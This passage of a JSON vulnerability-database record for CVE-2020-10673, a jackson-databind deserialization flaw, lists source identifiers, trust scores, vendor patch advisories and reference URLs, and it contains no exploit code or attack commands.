in parser resulting in a denial of service\n1638391 - CVE-2018-12541 vertx: WebSocket HTTP upgrade implementation holds the entire http request in memory before the handshake\n1697598 - CVE-2019-3797 spring-data-jpa: Additional information exposure with Spring Data JPA derived queries\n1700016 - CVE-2019-0231 mina-core: Retaining an open socket in close_notify SSL-TLS leading to Information disclosure. \n1713468 - CVE-2019-12086 jackson-databind: polymorphic typing issue allows attacker to read arbitrary local files on the server",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-10673"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003145"
},
{
"db": "VULHUB",
"id": "VHN-163175"
},
{
"db": "VULMON",
"id": "CVE-2020-10673"
},
{
"db": "PACKETSTORM",
"id": "158884"
},
{
"db": "PACKETSTORM",
"id": "158651"
},
{
"db": "PACKETSTORM",
"id": "159208"
},
{
"db": "PACKETSTORM",
"id": "158636"
},
{
"db": "PACKETSTORM",
"id": "159081"
},
{
"db": "PACKETSTORM",
"id": "159082"
}
],
"trust": 2.34
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2020-10673",
"trust": 4.0
},
{
"db": "PACKETSTORM",
"id": "159208",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "158651",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU95897514",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003145",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1151",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "159083",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "159015",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "158916",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "158891",
"trust": 0.7
},
{
"db": "NSFOCUS",
"id": "48050",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022060909",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1766",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2837",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2588",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2619",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1040",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3065",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3190",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2826",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2992",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "158884",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "159082",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "159081",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "158889",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "159080",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "158881",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "158650",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-163175",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2020-10673",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "158636",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163175"
},
{
"db": "VULMON",
"id": "CVE-2020-10673"
},
{
"db": "PACKETSTORM",
"id": "158884"
},
{
"db": "PACKETSTORM",
"id": "158651"
},
{
"db": "PACKETSTORM",
"id": "159208"
},
{
"db": "PACKETSTORM",
"id": "158636"
},
{
"db": "PACKETSTORM",
"id": "159081"
},
{
"db": "PACKETSTORM",
"id": "159082"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1151"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003145"
},
{
"db": "NVD",
"id": "CVE-2020-10673"
}
]
},
"id": "VAR-202003-1778",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-163175"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T21:52:13.747000Z",
"patch": {
"_id": null,
"data": [
{
"title": "hitachi-sec-2021-109 Software product security information",
"trust": 0.8,
"url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00027.html"
},
{
"title": "FasterXML jackson-databind Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=112629"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.3.2 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203461 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.3.2 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203462 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.3.2 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203463 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.3.2 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203464 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Single Sign-On 7.4.2 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203501 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.2.9 on RHEL 7 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203638 - Security Advisory"
},
{
"title": "Red Hat: Important: EAP Continuous Delivery Technical Preview Release 20 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203585 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.2.9 on RHEL 6 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203637 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.2.9 on RHEL 8 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203639 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.2.9 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203642 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Data Grid 7.3.7 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203779 - Security Advisory"
},
{
"title": "IBM: Security Bulletin: Multiple Security Vulnerabilities in Jackson-Databind Affect IBM Sterling B2B Integrator",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=9bb4efe27af18414a7db703d1dd40070"
},
{
"title": "Red Hat: Important: Red Hat Decision Manager 7.8.0 Security Update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203196 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Process Automation Manager 7.8.0 Security Update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203197 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat build of Thorntail 2.5.1 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202067 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Fuse 7.7.0 release and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203192 - Security Advisory"
},
{
"title": "Hitachi Security Advisories: Multiple Vulnerabilities in Cosminexus",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=hitachi_security_advisories\u0026qid=hitachi-sec-2021-109"
},
{
"title": "IBM: Security Bulletin: z/Transaction Processing Facility is affected by multiple vulnerabilities in the jackson-databind, jackson-dataformat-xml, jackson-core, slf4j-ext, and cxf-core packages",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=f974282a27702bae4111bf7716ee6cf6"
},
{
"title": "IBM: Security Bulletin: Multiple vulnerabilities in Data-Binding for Jackson shipped with IBM Operations Analytics \u00e2\u20ac\u201c Log Analysis",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=1db4c8cb14383c63d0c04205c943ef8a"
},
{
"title": "CVE-2020-10673",
"trust": 0.1,
"url": "https://github.com/Al1ex/CVE-2020-10673 "
},
{
"title": "Cubed",
"trust": 0.1,
"url": "https://github.com/yahoo/cubed "
},
{
"title": "https://github.com/huike007/poc",
"trust": 0.1,
"url": "https://github.com/huike007/poc "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2020-10673"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1151"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003145"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-502",
"trust": 1.0
},
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
},
{
"problemtype": "others (CWE-Other) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003145"
},
{
"db": "NVD",
"id": "CVE-2020-10673"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10673"
},
{
"trust": 1.7,
"url": "https://security.netapp.com/advisory/ntap-20200403-0002/"
},
{
"trust": 1.7,
"url": "https://github.com/fasterxml/jackson-databind/issues/2660"
},
{
"trust": 1.7,
"url": "https://www.oracle.com/security-alerts/cpujan2021.html"
},
{
"trust": 1.7,
"url": "https://www.oracle.com/security-alerts/cpujul2020.html"
},
{
"trust": 1.7,
"url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
},
{
"trust": 1.7,
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"trust": 1.7,
"url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00027.html"
},
{
"trust": 1.0,
"url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu95897514/index.html"
},
{
"trust": 0.7,
"url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-10672"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-10673"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.6,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10672"
},
{
"trust": 0.6,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022060909"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-series-of-vulnerabilities-in-fasterxml-jackson-databind-affect-apache-solr-shipped-with-ibm-operations-analytics-log-analysis/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2992/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-jackson-databind-shipped-with-ibm-cloud-pak-system/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/159015/red-hat-security-advisory-2020-3585-01.html"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/fasterxml-jackson-databind-privilege-escalation-via-resourceref-31850"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2588/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2837/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6525182"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-faster-xml-jackson-databind-affect-ibm-spectrum-protect-plus-cve-2020-10673-cve-2020-1112-cve-2020-11113-cve-2020-10672-cve-2020-10968-cve-2020-10969-cve-2/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2619/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/158916/red-hat-security-advisory-2020-3501-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1766/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/158651/red-hat-security-advisory-2020-3197-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/158891/red-hat-security-advisory-2020-3463-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/159208/red-hat-security-advisory-2020-3779-01.html"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6528214"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnerabilities-in-jackson-databind-affect-ibm-sterling-b2b-integrator-3/"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/48050"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2826/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3190/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1040/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-affects-ibm-jazz-foundation-and-ibm-engineering-products/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/159083/red-hat-security-advisory-2020-3642-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3065/"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-9547"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-9546"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-9548"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-8840"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1710"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-10714"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10714"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-1710"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1748"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-1748"
},
{
"trust": 0.3,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10740"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14297"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10693"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10687"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-14297"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14900"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10683"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-10683"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-10693"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-10687"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-14900"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-10740"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-10718"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10718"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-11112"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-11113"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-10968"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-11619"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-10969"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-11620"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-11111"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-1695"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9547"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1695"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9548"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8840"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9546"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-17573"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20444"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-14060"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11620"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17573"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11612"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20330"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-14061"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-20445"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10086"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-20444"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-10086"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-14062"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11619"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11111"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-20330"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-7238"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11112"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-11612"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10968"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20445"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10969"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11113"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-10172"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10172"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-1757"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-1745"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-6950"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.2/html-single/installation_guide/"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.2/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-6950"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14307"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-14307"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.3/html-single/installation_guide/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3461"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.3/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14060"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12406"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_process_automation_manager/7.8/html/release_notes_for_red_hat_process_automation_manager_7.8/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9514"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1718"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9515"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-13990"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=rhpam\u0026version=7.8.0"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9512"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12406"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3197"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9514"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9515"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1718"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9518"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13990"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-16869"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9512"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12423"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16869"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12423"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9518"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14061"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14062"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1719"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9488"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product\\xdata.grid\u0026downloadtype=securitypatches\u0026version=7.3"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1745"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9488"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3779"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1719"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1757"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_data_grid/7.3/html/red_hat_data_grid_7.3_release_notes/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-7658"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2017-7658"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-16335"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11797"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-16943"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12086"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-1000632"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000632"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9511"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12400"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-3831"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-0231"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-11797"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=jboss.fuse\u0026version=7.7.0"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-17531"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16335"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-12541"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-3797"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-4970"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17531"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9827"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14540"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17267"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.7/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9511"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12086"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16942"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14892"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-4970"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1953"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16943"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-0231"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-17267"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14893"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9827"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-16942"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14893"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-3831"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14888"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12400"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14892"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-12541"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14540"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3192"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14195"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-3797"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14888"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3637"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3638"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163175"
},
{
"db": "PACKETSTORM",
"id": "158884"
},
{
"db": "PACKETSTORM",
"id": "158651"
},
{
"db": "PACKETSTORM",
"id": "159208"
},
{
"db": "PACKETSTORM",
"id": "158636"
},
{
"db": "PACKETSTORM",
"id": "159081"
},
{
"db": "PACKETSTORM",
"id": "159082"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1151"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003145"
},
{
